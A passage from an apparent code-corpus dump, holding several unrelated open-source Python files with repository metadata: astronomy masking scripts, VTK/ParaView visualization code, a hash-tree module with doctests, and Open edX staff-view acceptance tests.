self.objects[0] = self.private_canvas
class ImageViewCanvasError(ImageViewTkError):
pass
class ImageViewCanvas(ImageViewZoom,
DrawingMixin, CanvasMixin, CompoundMixin):
def __init__(self, logger=None, rgbmap=None, settings=None,
bindmap=None, bindings=None):
ImageViewZoom.__init__(self, logger=logger,
rgbmap=rgbmap,
settings=settings,
bindmap=bindmap,
bindings=bindings)
CompoundMixin.__init__(self)
CanvasMixin.__init__(self)
DrawingMixin.__init__(self)
# we are both a viewer and a canvas
self.set_canvas(self, private_canvas=self)
self._mi = ModeIndicator(self)
#END
|
eteq/ginga
|
ginga/tkw/ImageViewTk.py
|
Python
|
bsd-3-clause
| 14,732
|
[
"FLEUR"
] |
dd489685af67b5b22ee0cc18f29ff1d821c143b34fcbe9898eb6d6482da7ea73
|
# Purpose: make masks based on 12CO ancillary data for data reduction
# and analysis.
# Date Programmer Description of Changes
# ----------------------------------------------------------------------
# 4/14/2020 A.A. Kepley Original Code
# 4/8/2021 A.A. Kepley Updated to include phangs and new hera data
import os
from degas.masking import cubemask
from degas.products import makeMap
#import degas
from astropy.table import Table, Column
import glob
import numpy as np
from spectral_cube import SpectralCube
# set desired mask parameters
peakCut = 5.0
lowCut = 3.0
# set up the relevant directories
analysisDir = os.environ['ANALYSISDIR']
scriptDir = os.environ['SCRIPTDIR']
maskDir = os.path.join(analysisDir,'CO')
if not os.path.exists(maskDir):
os.mkdir(maskDir)
otherDataDir = os.path.join(analysisDir,'ancillary_data')
#otherDataDir = os.environ['OTHERDATA']
# get list of galaxies in degas DR1
degas_table = Table.read(os.path.join(scriptDir,"degas_base.fits"))
# create a column for logging masks.
if 'MASK' in degas_table.colnames:
degas_table.remove_column('MASK')
degas_table.add_column(Column(np.full_like(degas_table['NAME'],''),dtype='S25'),name='MASK')
idx_dr1 = degas_table['DR1'] == 1
#idx_dr1 = degas_table['NAME'] == 'NGC4038'
# Extract list of galaxies via fancy list comprehension
# phangs
phangs_list = [os.path.basename(image).split('_')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'phangs','*10kms_gauss15.fits'))]
# heracles
heracles_list = [os.path.basename(image).split('_')[0] for image in glob.glob(os.path.join(otherDataDir,'heracles','*gauss15_fixed_kms.fits'))]
# everyHeracles (from Adam)
extra_hera_adam_list = [os.path.basename(image).split('_')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'everyHeracles_fromadam_20210318','*10kms_gauss15.fits'))]
# everyHERACLES
extra_hera_list = [os.path.basename(image).split('_')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'co_from_andreas','*.cube.fits'))]
# bima song
bima_list = [ os.path.basename(image).split('_')[0] for image in glob.glob(os.path.join(otherDataDir,'bima_song','*gauss15_fixed.fits'))]
# OVRO
ovro_list = [ os.path.basename(image).split('.')[0].upper() for image in glob.glob(os.path.join(otherDataDir,'temp_co','*co.cmmsk_gauss15_fixed.fits'))]
for galaxy in degas_table[idx_dr1]:
generateMoments = True
#for IC 0342 use Jialu's 12CO
if galaxy['NAME'] == 'IC0342':
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'jialu',
'ic0342_regrid_12co_cube_Tmb_10kms_gauss15.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
threeD=True,
minBeamFrac=1.5,
minNchan=5.0)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'GBT'
## use phangs first
elif galaxy['NAME'] in phangs_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'phangs',
galaxy['NAME'].lower() + '_12m+7m+tp_co21_10kms_gauss15.fits')
## works for NGC2903 and NGC3521 and NGC4569
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut, lowCut=lowCut,
minBeamFrac=2.0,
minNchan=3.0)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'PHANGS'
## use heracles second
elif galaxy['NAME'] in heracles_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'heracles',
galaxy['NAME']+'_heracles_gauss15_fixed_kms.fits')
if galaxy['NAME'] == 'NGC0337':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.5,
minNchan=3.0,
threeD=True)
else:
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
minBeamFrac=1.5)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'HERACLES'
## use extra HERA data from adam next
elif galaxy['NAME'] in extra_hera_adam_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'everyHeracles_fromadam_20210318',
galaxy['NAME'].lower()+'_hera_co21_native_fixed_10kms_gauss15.fits')
if galaxy['NAME'] == 'NGC3147':
# this galaxy has a lot of fluffy low-level CO emission. By channel doesn't identify it as much as doing a three dimension cut for things that show up in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.5,threeD=True,minNchan=5.0)
elif galaxy['NAME'] == 'NGC3631':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
skipChan=[5])
elif galaxy['NAME'] == 'NGC4030':
# this galaxy has a lot of fluffy low-level CO emission. By channel doesn't identify it as much as doing a three dimension cut for things that show up in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.0,threeD=True,minNchan=3.0)
else:
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'everyHERACLES'
## use HERA data from Andreas next (everyHERACLES)
elif galaxy['NAME'] in extra_hera_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'co_from_andreas',
galaxy['NAME'].lower()+'_hera_co21.cube_fixed_10kms_gauss15.fits')
if galaxy['NAME'] == 'NGC3631':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
skipChan=[5])
elif galaxy['NAME'] == 'NGC4030':
# this galaxy has a lot of fluffy low-level CO emission. By channel doesn't identify it as much as doing a three dimension cut for things that show up in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.0,threeD=True,minNchan=3.0)
elif galaxy['NAME'] == 'NGC3147':
# this galaxy has a lot of fluffy low-level CO emission. By channel doesn't identify it as much as doing a three dimension cut for things that show up in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.5,threeD=True,minNchan=5.0)
elif galaxy['NAME'] == 'NGC4501':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
skipChan=[15])
elif galaxy['NAME'] == 'NGC4535':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
minBeamFrac=1.5)
else:
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'everyHERACLES_Andreas'
## use bima third
elif galaxy['NAME'] in bima_list:
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
# single pointing case
if galaxy['NAME'] == 'NGC4414':
cubeFile = os.path.join(otherDataDir,'bima_song',
galaxy['NAME']+'_bima_gauss15_fixed.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,
lowCut=lowCut)
# multiple pointing cases
else:
cubeFile = os.path.join(otherDataDir,'bima_song',
galaxy['NAME']+'_bima_gauss15_fixed.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,
lowCut=2.0,
noise3D=True)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'BIMASONG'
## use ovro next
elif galaxy['NAME'] in ovro_list:
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'temp_co',
galaxy['NAME'].lower()+'.co.cmmsk_gauss15_fixed.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'OVRO'
##
elif galaxy['NAME'] == 'NGC4038':
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'ngc4038_from_chris',
'ngc_4038_4039_7m_co10_fixed_gauss15.fits')
## ALMA DATA FROM CHRIS WILSON
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut, lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'WILSON'
else:
generateMoments=False
print(galaxy['NAME']+" doesn't appear to have ancillary CO data.")
if generateMoments:
# copy cube over to 12CO directory. Potentially could just do
# this via a copy command. Doing it via sectral cube so I can
# add other features in and to make sure that the header is
# sanitized.
cube = SpectralCube.read(cubeFile)
cube.write(os.path.join(maskDir,galaxy['NAME']+'_12CO'+line+'.fits'),overwrite=True)
# Mom0
makeMap(cubeFile,maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO'+line,
maptype='moment',order=0)
# peakInt
makeMap(cubeFile,maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO'+line,
maptype='peakIntensity')
# moment 1
makeMap(cubeFile, maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO',
maptype='moment',order=1)
# peak Vel
makeMap(cubeFile,maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO',
maptype='peakVelocity')
# 2D mask
makeMap(os.path.join(maskDir,outName), maskDir,
baseName = galaxy['NAME']+'_12CO',
maptype='mask2D')
# write out degas data base table with the mask used.
degas_table.write(os.path.join(scriptDir,"degas_base.fits"),overwrite=True)
|
low-sky/degas
|
scripts/process_12CO.py
|
Python
|
gpl-3.0
| 12,171
|
[
"Galaxy"
] |
095446f71ab24477a069ec42acabc7fa77fcd36844e40809d55b0f4eb381cd48
|
'''
Created on Aug 5, 2014
@author: gearsad
'''
import vtk
from SceneObject import SceneObject
class Text(SceneObject):
'''
A text object.
'''
# The camera texture
cameraVtkTexture = None
def __init__(self, renderer, parent, text, scale, position):
'''
Initialize the CameraScreen model.
'''
# Call the parent constructor
super(Text,self).__init__(renderer, parent)
atext = vtk.vtkVectorText()
atext.SetText(text)
textMapper = vtk.vtkPolyDataMapper()
textMapper.SetInputConnection(atext.GetOutputPort())
# self.vtkActor = vtk.vtkFollower()
self.vtkActor.SetMapper(textMapper)
self.vtkActor.SetScale(scale, scale, scale)
self.vtkActor.SetPosition(position)
|
GearsAD/semisorted_arnerve
|
arnerve/scene/Text.py
|
Python
|
mit
| 799
|
[
"VTK"
] |
7d9ef08004844d50f7fc4a946e272deaa091c9e4fcf6ee43efb6443d5b57fb8c
|
from enum import IntEnum
from hashkernel.bakery import (
CakePath, HasCake, Cake, CakeRack, CakeRole)
from hashkernel import Str2Bytes
class NodeState(IntEnum):
"""
>>> list(NodeState) #doctest: +NORMALIZE_WHITESPACE
[<NodeState.unknown: 0>, <NodeState.scanning: 1>,
<NodeState.scanned: 2>, <NodeState.storing: 3>,
<NodeState.stored: 4>, <NodeState.pruned: 5>]
>>> [v.end_state() for v in NodeState]
[False, False, True, False, True, True]
"""
unknown = 0
scanning = 1
scanned = 2
storing = 3
stored = 4
pruned = 5
def end_state(self):
return self.name[-1] == 'd'
class Node(HasCake):
def __init__(self, parent, name, state=NodeState.unknown):
self.name = name
self.parent = parent
self.state = state
if isinstance(self.parent, Neuron):
self.parent.add_child(self)
elif self.parent is not None:
raise AssertionError('has to be Neuron or None')
def __str__(self):
return '/'.join( g.name for g in self.ancestry())
def __repr__(self):
return str(self)
def root(self):
if self.parent is not None:
return self.parent.root()
else:
return self
def cake_path(self, relative=None):
path = list(self.ancestry(include_root=True))
if path[0].relative():
relative = True
elif relative is None:
relative = False
path_names = [p.name for p in path[1:]]
if relative:
return CakePath(None, _root=None, _path=path_names)
else:
return CakePath(None, _root=path[0].portal, _path=path_names)
def ancestry(self, include_root=None):
include_self = True
if self.parent is not None:
for grandpa in self.parent.ancestry(include_root):
yield grandpa
else: #CakeTree
include_self = not(self.relative()) if include_root is None \
else include_root
if include_self:
yield self
def __iter__(self):
""" no children implementation """
return
yield # pragma: no cover
def role(self):
return self.cake().header.role
class CakeNode(Node):
def __init__(self, parent, name, cake, state=NodeState.unknown):
Node.__init__(self,parent, name, state)
self._cake = Cake.ensure_it(cake)
def cake(self):
return self._cake
class Neuron(Node, Str2Bytes):
def __init__(self, parent, name, state=NodeState.unknown):
Node.__init__(self, parent, name, state)
self.store = {}
self._bundle = None
def prune(self):
return CakeNode(self.parent, self.name, self.cake(),
NodeState.pruned)
def role(self):
return CakeRole.NEURON
def clean(self):
self._bundle = None
if self.parent is not None:
self.parent.clean()
def add_child(self, child):
self.store[child.name] = child
self.clean()
def __setitem__(self, k, cake):
k = CakePath.ensure_it(k)
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is None:
raise AssertionError('Cannot set itself')
else:
self.store[nxt_path] = CakeNode(self, nxt_path, cake)
self.clean()
else:
if nxt_path not in self.store:
self.store[nxt_path] = Neuron(self,nxt_path)
self.store[nxt_path][reminder] = cake
def __delitem__(self, k):
k = CakePath.ensure_it(k)
self._bundle = None
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is None:
raise AssertionError('Cannot delete itself')
else:
del self.store[nxt_path]
self.clean()
else:
del self.store[nxt_path][reminder]
def __getitem__(self, k):
k = CakePath.ensure_it(k)
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is None:
return self
else:
return self.store[nxt_path]
else:
return self.store[nxt_path][reminder]
def __len__(self):
return len(self.store)
def __contains__(self, k):
k = CakePath.ensure_it(k)
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is not None:
return nxt_path in self.store
else:
return False
else:
return reminder in self.store[nxt_path]
def __iter__(self):
for name in sorted(self.store):
yield self.store[name]
def visit_tree(self, depth=None):
if depth is not None:
if depth <= 0 :
return
depth -= 1
if depth is None or depth > 0 :
for v in self:
if isinstance(v, Neuron):
for child in v.visit_tree(depth):
yield child
else:
yield v
yield self
def bundle(self):
if self._bundle is None:
self._bundle = CakeRack()
for k in self.store:
self._bundle[k]= self.store[k].cake()
return self._bundle
def cake(self):
return self.bundle().cake()
class CakeTree(Neuron):
"""
>>> x = CakeTree()
>>> x['a/b'] = '0'
>>> x.cake()
Cake('1kmRGqqGH36SWaMEp1EsTSLWbFKGN8VvMyd7M7uyzJQ9')
>>> x.bundle().content()
'[["a"], ["CrBXOJUepyW6bMd2Wgl"]]'
>>> x["a"].bundle().content()
'[["b"], ["0"]]'
>>> "a" in x
True
>>> x["a"].cake()
Cake('CrBXOJUepyW6bMd2Wgl')
>>> x["a/b"].cake()
Cake('0')
>>> list(x['a/b'].ancestry())
[a, a/b]
>>> "a/b" in x
True
>>> "" in x
False
>>> x['a/c'] = '0'
>>> x['a/c'].root() == x
True
>>> x['a/c'].cake_path()
CakePath('a/c')
>>> x['a/c'].cake_path(relative=False)
CakePath('a/c')
>>> list(x['a/b'])
[]
>>> list(x['a'])
[a/b, a/c]
>>> list(x)
[a]
>>> x.cake()
Cake('3IRoNogXy7sW3pKtB66DCwNbqEvDgYZ7iDGLzimya2MV')
>>> x["a"].bundle().content()
'[["b", "c"], ["0", "0"]]'
>>> len(x["a"])
2
>>> del x["a/c"]
>>> x.cake()
Cake('1kmRGqqGH36SWaMEp1EsTSLWbFKGN8VvMyd7M7uyzJQ9')
>>> x["a"].bundle().content()
'[["b"], ["0"]]'
>>> x["a"].cake()
Cake('CrBXOJUepyW6bMd2Wgl')
>>> x[""].cake()
Cake('1kmRGqqGH36SWaMEp1EsTSLWbFKGN8VvMyd7M7uyzJQ9')
>>> len(x)
1
>>> x[""]="0"
Traceback (most recent call last):
...
AssertionError: Cannot set itself
>>> del x[""]
Traceback (most recent call last):
...
AssertionError: Cannot delete itself
>>> x.bundle().content()
'[["a"], ["CrBXOJUepyW6bMd2Wgl"]]'
>>> from hashkernel.bakery import Cake
>>> g=Cake('4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T')
>>> y=CakeTree(g)
>>> y
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T
>>> y['a/b/c']='0'
>>> y['a/z']='0'
>>> y['a/b/c']
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b/c
>>> list(y.visit_tree(3)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/z,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> list(y.visit_tree(2)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> list(y.visit_tree(1))
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> list(y.visit_tree(0))
[]
>>> list(y.visit_tree(None)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b/c,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/z,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> [ v.role().code for v in y.visit_tree()]
[0, 1, 0, 1, 1]
>>> len(list(y.visit_tree(None))) == len(list(y.visit_tree(4)))
True
>>> y['a/b'].prune()
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b
>>> list(y.visit_tree(None)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/z,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> isinstance(y['a/b'],CakeNode)
True
>>> y['a']['b'].cake_path(relative=True)
CakePath('a/b')
>>> y['a']['b'].cake_path()
CakePath('/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b')
>>> y['a']['b'].cake_path(relative=False)
CakePath('/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b')
"""
def __init__(self, portal = None, path =None):
self.portal = portal
self.path = path
name = None if portal is None else '/' + str(self.portal)
Neuron.__init__(self, None, name)
def relative(self):
return self.portal is None
def __str__(self):
return '' if self.name is None else self.name
|
walnutgeek/hashstore
|
hashstore/bakery/cake_tree.py
|
Python
|
apache-2.0
| 9,430
|
[
"NEURON"
] |
98a27a5437acada37b9d362557e6ac63117166a4a5f865d8c23e9884e21bcd4d
|
from paraview.simple import *
import glob
import re
opacityBaffles=0.6
opacityImpeller=1.0
opacityTank=0.2
liste = glob.glob('./post/VTK/mixer_*.vtk')
listeImpl = glob.glob('./post/VTK/impeller_*.stl')
listeTank = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/tank.stl')
listeBafflesB = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffB.stl')
listeBafflesF = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffF.stl')
listeBafflesL = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffL.stl')
listeBafflesR = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffR.stl')
# Function to sort the files in a natural fashion
def natural_sort(l):
convert = lambda text: int(text) if text.isdigit() else text.lower()
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
return sorted(l, key = alphanum_key)
liste=natural_sort(liste)
listeImpl=natural_sort(listeImpl)
# LOAD THE IMPELLER
impeller=STLReader(FileNames=listeImpl)
GetActiveSource()
DataRepresentation1 = Show()
DataRepresentation1.PointSpriteDefaultsInitialized = 1
DataRepresentation1.SelectionPointFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.SelectionCellFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.ColorArrayName = ('CELL_DATA', '')
DataRepresentation1.RadiusRange = [-0.08255, 0.08255]
DataRepresentation1.ScaleFactor = 0.02920000106096268
STLReader2 = FindSource( "STLReader2" )
my_representation0 = GetDisplayProperties( STLReader2 )
RenameSource("Impeller", STLReader2)
# LOAD THE TANK
tank=STLReader(FileNames=listeTank)
STLReader2 = GetActiveSource()
RenderView1 = GetRenderView()
RenderView1.CameraPosition = [0.0, 0.0, 1.4038138401361357]
RenderView1.CameraClippingRange = [0.8459256875250272, 1.6967960548430514]
RenderView1.CameraFocalPoint = [0.0, 0.0, 0.18250000476837158]
RenderView1.CameraParallelScale = 0.31609928064038195
RenderView1.CenterOfRotation = [0.0, 0.0, 0.18250000476837158]
DataRepresentation1 = Show()
DataRepresentation1.ConstantRadius = 0.18250000476837158
DataRepresentation1.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation1.PointSpriteDefaultsInitialized = 1
DataRepresentation1.SelectionPointFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.SelectionCellFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.ColorArrayName = ('CELL_DATA', 'STLSolidLabeling')
DataRepresentation1.Texture = []
DataRepresentation1.AmbientColor = [0.0, 0.0, 0.0]
DataRepresentation1.CubeAxesColor = [0.0, 0.0, 0.0]
DataRepresentation1.RadiusRange = [-0.1825, 0.1825]
DataRepresentation1.ScaleFactor = 0.03650000095367432
DataRepresentation2 = GetDisplayProperties( STLReader2 )
DataRepresentation2.Opacity = opacityTank
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
RenameSource("Tank", STLReader2)
#PARTICLES
square=LegacyVTKReader(FileNames=liste)
RenderView1 = GetRenderView()
RenderView1.CameraPosition = [-0.00032399967312812805, -0.0002795010805130005, 0.799224061999444]
RenderView1.CameraClippingRange = [0.5396848694000508, 0.5986885115576086]
RenderView1.CameraFocalPoint = [-0.00032399967312812805, -0.0002795010805130005, 0.23402100056409836]
RenderView1.CameraParallelScale = 0.1462853166497175
RenderView1.CenterOfRotation = [-0.00032399967312812805, -0.0002795010805130005, 0.23402100056409836]
DataRepresentation1 = Show()
DataRepresentation1.ConstantRadius = 0.0015
DataRepresentation1.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation1.PointSpriteDefaultsInitialized = 1
DataRepresentation1.SelectionPointFieldDataArrayName = 'f'
DataRepresentation1.SelectionCellFieldDataArrayName = 'radius'
DataRepresentation1.ColorArrayName = ('POINT_DATA', 'radius')
DataRepresentation1.Texture = []
DataRepresentation1.AmbientColor = [0.0, 0.0, 0.0]
DataRepresentation1.Representation = 'Point Sprite'
DataRepresentation1.CubeAxesColor = [0.0, 0.0, 0.0]
DataRepresentation1.RadiusRange = [-0.10308, 0.102432]
DataRepresentation1.ScaleFactor = 0.020727699995040896
a1_radius_PVLookupTable = GetLookupTableForArray( "radius", 1, RGBPoints=[0.004000000189989805, 0.0, 0.0, 1.0, 0.004000000189989905, 1.0, 0.0, 0.0], VectorMode='Component', NanColor=[0.498039, 0.498039, 0.498039], ColorSpace='HSV', ScalarRangeInitialized=1.0 )
a1_radius_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.004000000189989805, 0.0, 0.5, 0.0, 0.004000000189989905, 1.0, 0.5, 0.0] )
Render()
# LOAD THE BAFFLES one by one..
# R Baffle
bafflesR=STLReader(FileNames=listeBafflesR)
STLReader3 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader3 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
RenameSource("BaffR", STLReader3)
#PARTICLES
square=LegacyVTKReader(FileNames=liste)
RenderView1 = GetRenderView()
RenderView1.CameraPosition = [-0.00032399967312812805, -0.0002795010805130005, 0.799224061999444]
# L Baffle
bafflesL=STLReader(FileNames=listeBafflesL)
STLReader4 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader4 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
# F baffle
bafflesF=STLReader(FileNames=listeBafflesF)
STLReader5 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader5 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
# B baffle
bafflesB=STLReader(FileNames=listeBafflesB)
STLReader6 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader6 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
|
mendax-grip/cfdemUtilities
|
paraview/mixerParticlesBaffles.py
|
Python
|
lgpl-3.0
| 5,661
|
[
"ParaView",
"VTK"
] |
8cd70c44700c584601ff337ee00d86349819d933ee9a69429bb695580e8853cf
|
# -*- coding: utf-8 -*-
"""
Tests the "preview" selector in the LMS that allows changing between Staff, Learner, and Content Groups.
"""
from textwrap import dedent
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.courseware import CoursewarePage
from common.test.acceptance.pages.lms.instructor_dashboard import InstructorDashboardPage
from common.test.acceptance.pages.lms.staff_view import StaffCoursewarePage
from common.test.acceptance.tests.helpers import UniqueCourseTest, create_user_partition_json
from openedx.core.lib.tests import attr
from xmodule.partitions.partitions import ENROLLMENT_TRACK_PARTITION_ID, MINIMUM_STATIC_PARTITION_ID, Group
@attr(shard=20)
class StaffViewTest(UniqueCourseTest):
"""
Tests that verify the staff view.
"""
USERNAME = "STAFF_TESTER"
EMAIL = "johndoe@example.com"
def setUp(self):
super(StaffViewTest, self).setUp()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
# Install a course with sections/problems, tabs, updates, and handouts
self.course_fixture = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
self.populate_course_fixture(self.course_fixture)
self.course_fixture.install()
# Auto-auth register for the course.
# Do this as global staff so that you will see the Staff View
AutoAuthPage(self.browser, username=self.USERNAME, email=self.EMAIL,
course_id=self.course_id, staff=True).visit()
def _goto_staff_page(self):
"""
Open staff page with assertion
"""
self.courseware_page.visit()
staff_page = StaffCoursewarePage(self.browser, self.course_id)
self.assertEqual(staff_page.staff_view_mode, 'Staff')
return staff_page
@attr(shard=20)
class CourseWithoutContentGroupsTest(StaffViewTest):
"""
Setup for tests that have no content restricted to specific content groups.
"""
def populate_course_fixture(self, course_fixture):
"""
Populates test course with chapter, sequential, and 2 problems.
"""
problem_data = dedent("""
<problem markdown="Simple Problem" max_attempts="" weight="">
<p>Choose Yes.</p>
<choiceresponse>
<checkboxgroup>
<choice correct="true">Yes</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""")
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('problem', 'Test Problem 1', data=problem_data),
XBlockFixtureDesc('problem', 'Test Problem 2', data=problem_data)
)
)
)
@attr(shard=20)
class StaffViewToggleTest(CourseWithoutContentGroupsTest):
"""
Tests for the staff view toggle button.
"""
def test_instructor_tab_visibility(self):
"""
Test that the instructor tab is hidden when viewing as a student.
"""
course_page = self._goto_staff_page()
self.assertTrue(course_page.has_tab('Instructor'))
course_page.set_staff_view_mode('Learner')
self.assertEqual(course_page.staff_view_mode, 'Learner')
self.assertFalse(course_page.has_tab('Instructor'))
@attr(shard=20)
class StaffDebugTest(CourseWithoutContentGroupsTest):
"""
Tests that verify the staff debug info.
"""
def test_reset_attempts_empty(self):
"""
Test that we reset even when there is no student state
"""
staff_debug_page = self._goto_staff_page().open_staff_debug_info()
staff_debug_page.reset_attempts()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(
u'Successfully reset the attempts for user {}'.format(self.USERNAME), msg,
)
def test_delete_state_empty(self):
"""
Test that we delete properly even when there isn't state to delete.
"""
staff_debug_page = self._goto_staff_page().open_staff_debug_info()
staff_debug_page.delete_state()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(
u'Successfully deleted student state for user {}'.format(self.USERNAME), msg,
)
def test_reset_attempts_state(self):
"""
Successfully reset the student attempts
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.reset_attempts()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(
u'Successfully reset the attempts for user {}'.format(self.USERNAME), msg,
)
def test_rescore_problem(self):
"""
Rescore the student
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.rescore()
